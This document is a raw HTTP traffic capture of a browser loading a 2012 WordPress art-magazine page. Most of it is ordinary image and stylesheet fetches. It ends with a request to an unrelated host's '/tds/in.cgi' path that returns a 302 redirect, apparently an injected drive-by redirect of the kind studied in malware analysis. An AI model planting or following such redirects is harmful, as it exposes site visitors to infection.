Date: Wed, 07 Nov 2012 16:21:13 GMT
Content-Length: 6003
Connection: keep-alive
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Cache-Control: max-age=315360000,public
Expires: Mon, 15 Aug 2022 18:03:57 UTC
Last-Modified: Sat, 24 Oct 2009 04:03:06 GMT
Accept-Ranges: bytes
Age: 4550963
X-Cache: HIT from photocache322.flickr.ac4.yahoo.com
X-Cache-Lookup: HIT from photocache322.flickr.ac4.yahoo.com:83
Via: 1.1 photocache322.flickr.ac4.yahoo.com:83 (squid/2.7.STABLE9)
GET /2700/4039064486_f7d7b09e79_s.jpg HTTP/1.1

Host: farm3.staticflickr.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:13 GMT
Content-Length: 8011
Connection: keep-alive
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Cache-Control: max-age=315360000,public
Expires: Mon, 15 Aug 2022 18:03:57 UTC
Last-Modified: Sat, 24 Oct 2009 04:03:06 GMT
Accept-Ranges: bytes
Age: 247940
X-Cache: HIT from photocache323.flickr.ac4.yahoo.com
X-Cache-Lookup: HIT from photocache323.flickr.ac4.yahoo.com:83
Via: 1.1 photocache323.flickr.ac4.yahoo.com:83 (squid/2.7.STABLE9)
GET /wp-content/themes/arthemia-premium/pagenavi-css.css HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: text/css
Date: Wed, 07 Nov 2012 16:21:13 GMT
Server: Apache
Last-Modified: Tue, 10 Mar 2009 00:47:04 GMT
Etag: &quot;695-464b916f93200&quot;
Accept-Ranges: bytes
Content-Length: 1685
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /3515/4038315305_4a32c4fb7e_s.jpg HTTP/1.1

Host: farm4.staticflickr.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:13 GMT
Content-Length: 20267
Connection: keep-alive
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Cache-Control: max-age=315360000,public
Expires: Tue, 16 Aug 2022 20:14:55 UTC
Last-Modified: Sat, 24 Oct 2009 04:02:50 GMT
Accept-Ranges: bytes
Age: 247940
X-Cache: HIT from photocache401.flickr.ac4.yahoo.com
X-Cache-Lookup: HIT from photocache401.flickr.ac4.yahoo.com:83
Via: 1.1 photocache401.flickr.ac4.yahoo.com:83 (squid/2.7.STABLE9)
GET /3082/4039064600_f7ea62c048_s.jpg HTTP/1.1

Host: farm4.staticflickr.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:13 GMT
Content-Length: 22828
Connection: keep-alive
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Cache-Control: max-age=315360000,public
Expires: Mon, 07 Nov 2022 07:55:48 UTC
Last-Modified: Sat, 24 Oct 2009 04:03:09 GMT
Accept-Ranges: bytes
Age: 66785
X-Cache: HIT from photocache416.flickr.ac4.yahoo.com
X-Cache-Lookup: HIT from photocache416.flickr.ac4.yahoo.com:83
Via: 1.1 photocache416.flickr.ac4.yahoo.com:83 (squid/2.7.STABLE9)
GET /3506/4038315439_a070bd6edb_s.jpg HTTP/1.1

Host: farm4.staticflickr.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:13 GMT
Content-Length: 20471
Connection: keep-alive
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Cache-Control: max-age=315360000,public
Expires: Mon, 07 Nov 2022 07:55:46 UTC
Last-Modified: Sat, 24 Oct 2009 04:02:54 GMT
Accept-Ranges: bytes
Age: 66787
X-Cache: HIT from photocache406.flickr.ac4.yahoo.com
X-Cache-Lookup: HIT from photocache406.flickr.ac4.yahoo.com:83
Via: 1.1 photocache406.flickr.ac4.yahoo.com:83 (squid/2.7.STABLE9)
GET /2501/4039064382_07b0e2e71d_s.jpg HTTP/1.1

Host: farm3.staticflickr.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:13 GMT
Content-Length: 18941
Connection: keep-alive
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Cache-Control: max-age=315360000,public
Expires: Mon, 15 Aug 2022 18:03:58 UTC
Last-Modified: Sat, 24 Oct 2009 04:03:01 GMT
Accept-Ranges: bytes
Age: 247940
X-Cache: HIT from photocache319.flickr.ac4.yahoo.com
X-Cache-Lookup: HIT from photocache319.flickr.ac4.yahoo.com:83
Via: 1.1 photocache319.flickr.ac4.yahoo.com:83 (squid/2.7.STABLE9)
GET /2616/4039064334_6a432bc107_s.jpg HTTP/1.1

Host: farm3.staticflickr.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:13 GMT
Content-Length: 19522
Connection: keep-alive
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Cache-Control: max-age=315360000,public
Expires: Mon, 26 Sep 2022 02:45:58 UTC
Last-Modified: Sat, 24 Oct 2009 04:03:00 GMT
Accept-Ranges: bytes
Age: 247940
X-Cache: HIT from photocache313.flickr.ac4.yahoo.com
X-Cache-Lookup: HIT from photocache313.flickr.ac4.yahoo.com:83
Via: 1.1 photocache313.flickr.ac4.yahoo.com:83 (squid/2.7.STABLE9)
GET /2651/4039064284_493d8e137a_s.jpg HTTP/1.1

Host: farm3.staticflickr.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:13 GMT
Content-Length: 21734
Connection: keep-alive
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Cache-Control: max-age=315360000,public
Expires: Sun, 25 Sep 2022 22:57:11 UTC
Last-Modified: Sat, 24 Oct 2009 04:02:57 GMT
Accept-Ranges: bytes
Age: 247940
X-Cache: HIT from photocache311.flickr.ac4.yahoo.com
X-Cache-Lookup: HIT from photocache311.flickr.ac4.yahoo.com:83
Via: 1.1 photocache311.flickr.ac4.yahoo.com:83 (squid/2.7.STABLE9)
GET /2631/4038315651_46063183b5_s.jpg HTTP/1.1

Host: farm3.staticflickr.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:13 GMT
Content-Length: 16524
Connection: keep-alive
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Cache-Control: max-age=315360000,public
Expires: Mon, 15 Aug 2022 18:03:58 UTC
Last-Modified: Sat, 24 Oct 2009 04:03:03 GMT
Accept-Ranges: bytes
Age: 247940
X-Cache: HIT from photocache321.flickr.ac4.yahoo.com
X-Cache-Lookup: HIT from photocache321.flickr.ac4.yahoo.com:83
Via: 1.1 photocache321.flickr.ac4.yahoo.com:83 (squid/2.7.STABLE9)
GET /wp-includes/js/thickbox/thickbox.css HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: text/css
Date: Wed, 07 Nov 2012 16:21:13 GMT
Server: Apache
Last-Modified: Thu, 10 Sep 2009 18:32:22 GMT
Etag: &quot;f18-4733d6b957980&quot;
Accept-Ranges: bytes
Content-Length: 3864
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /images/share-icon-16x16.png?CXNID=1000014.0NXC HTTP/1.1

Host: w.sharethis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://w.sharethis.com/button/css/sharethis.f8aeb821aa52b7af5ae4d3675118594c.css
HTTP/1.1 200 OK

Content-Type: image/png
Server: nginx/1.0.15
Content-Length: 1007
Expires: Thu, 07 Nov 2013 16:10:39 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes
Date: Wed, 07 Nov 2012 16:21:13 GMT
Connection: keep-alive
GET /2607/4038315381_2723e8f020_s.jpg HTTP/1.1

Host: farm3.staticflickr.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:13 GMT
Content-Length: 22021
Connection: keep-alive
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Cache-Control: max-age=315360000,public
Expires: Sun, 25 Sep 2022 22:57:11 UTC
Last-Modified: Sat, 24 Oct 2009 04:02:52 GMT
Accept-Ranges: bytes
Age: 247940
X-Cache: HIT from photocache326.flickr.ac4.yahoo.com
X-Cache-Lookup: HIT from photocache326.flickr.ac4.yahoo.com:83
Via: 1.1 photocache326.flickr.ac4.yahoo.com:83 (squid/2.7.STABLE9)
GET /2784/4039064036_9ecb390fc8_s.jpg HTTP/1.1

Host: farm3.staticflickr.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:13 GMT
Content-Length: 21663
Connection: keep-alive
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Cache-Control: max-age=315360000,public
Expires: Mon, 15 Aug 2022 18:03:58 UTC
Last-Modified: Sat, 24 Oct 2009 04:02:47 GMT
Accept-Ranges: bytes
Age: 247940
X-Cache: HIT from photocache313.flickr.ac4.yahoo.com
X-Cache-Lookup: HIT from photocache313.flickr.ac4.yahoo.com:83
Via: 1.1 photocache313.flickr.ac4.yahoo.com:83 (squid/2.7.STABLE9)
GET /2541/4039063980_1e17d4bd39_s.jpg HTTP/1.1

Host: farm3.staticflickr.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:13 GMT
Content-Length: 22178
Connection: keep-alive
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Cache-Control: max-age=315360000,public
Expires: Sun, 25 Sep 2022 22:57:11 UTC
Last-Modified: Sat, 24 Oct 2009 04:02:46 GMT
Accept-Ranges: bytes
Age: 247940
X-Cache: HIT from photocache324.flickr.ac4.yahoo.com
X-Cache-Lookup: HIT from photocache324.flickr.ac4.yahoo.com:83
Via: 1.1 photocache324.flickr.ac4.yahoo.com:83 (squid/2.7.STABLE9)
GET /wp-content/uploads//2010/04/7-pages-web-42.jpg HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:12 GMT
Server: Apache
Last-Modified: Tue, 27 Apr 2010 17:59:55 GMT
Etag: &quot;3d1ab-4853ba9317cc0&quot;
Accept-Ranges: bytes
Content-Length: 250283
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /wp-content/uploads//2010/04/7pages-web11.jpg HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:12 GMT
Server: Apache
Last-Modified: Tue, 27 Apr 2010 18:05:18 GMT
Etag: &quot;4aa7d-4853bbc721380&quot;
Accept-Ranges: bytes
Content-Length: 305789
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /wp-content/uploads//2010/04/7-pages-3.jpg HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:12 GMT
Server: Apache
Last-Modified: Tue, 27 Apr 2010 17:59:07 GMT
Etag: &quot;2fef8-4853ba65510c0&quot;
Accept-Ranges: bytes
Content-Length: 196344
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /wp-content/uploads//2010/04/7-pages-web-6.jpg HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 16:21:12 GMT
Server: Apache
Last-Modified: Tue, 27 Apr 2010 17:53:49 GMT
Etag: &quot;311e5-4853b9360c540&quot;
Accept-Ranges: bytes
Content-Length: 201189
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/images/loupe.gif HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 07 Nov 2012 16:21:13 GMT
Server: Apache
Last-Modified: Tue, 10 Mar 2009 00:46:32 GMT
Etag: &quot;22f-464b91510ea00&quot;
Accept-Ranges: bytes
Content-Length: 559
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/images/ads/mailingsmall.gif HTTP/1.1

Host: artworksmagazine.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 07 Nov 2012 16:21:13 GMT
Server: Apache
Last-Modified: Thu, 10 Jun 2010 18:58:16 GMT
Etag: &quot;6aab-488b19ae30200&quot;
Accept-Ranges: bytes
Content-Length: 27307
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=http://artworksmagazine.com/wp-content/uploads/2009/02/art4good-logo1.jpg&w=80&h=80&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=http://artworksmagazine.com/wp-content/uploads/2009/02/art4good-logo1.jpg&amp;w=80&amp;h=80&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:13 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:52GMT
Last-Modified: Thu, 26 Mar 2009 19:30:21 GMT
Content-Length: 8597
Etag: 74de5f915765ea59816e770a8e686f38
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=http://artworksmagazine.com/wp-content/uploads//2010/01/TimKnox-54421.jpg&w=80&h=80&zc=1&q=100 HTTP/1.1

Host: artworksmagazine.com
GET /wp-content/themes/arthemia-premium/scripts/timthumb.php?src=http://artworksmagazine.com/wp-content/uploads//2010/01/TimKnox-54421.jpg&amp;w=80&amp;h=80&amp;zc=1&amp;q=100 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
Cookie: wassup=c04314bdfff82c6b14a77ce0040c7bf8%3A%3A1352307971; __utma=162141804.251416616.1352305272.1352305272.1352305272.1; __utmb=162141804.1.10.1352305272; __utmc=162141804; __utmz=162141804.1352305272.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/jpeg; charset=binary
Date: Wed, 07 Nov 2012 16:21:13 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=9999, must-revalidate
Expires: Wed, 07 Nov 2012 19:07:53GMT
Last-Modified: Thu, 25 Mar 2010 20:13:35 GMT
Content-Length: 7251
Etag: 3472ab80b6dff70c54758fd6dfc800c2
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /tds/in.cgi?7 HTTP/1.1

Host: dvd-players-sale.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://artworksmagazine.com/2010/04/photography-of-alexis-west/
HTTP/1.1 302 Moved Temporarily

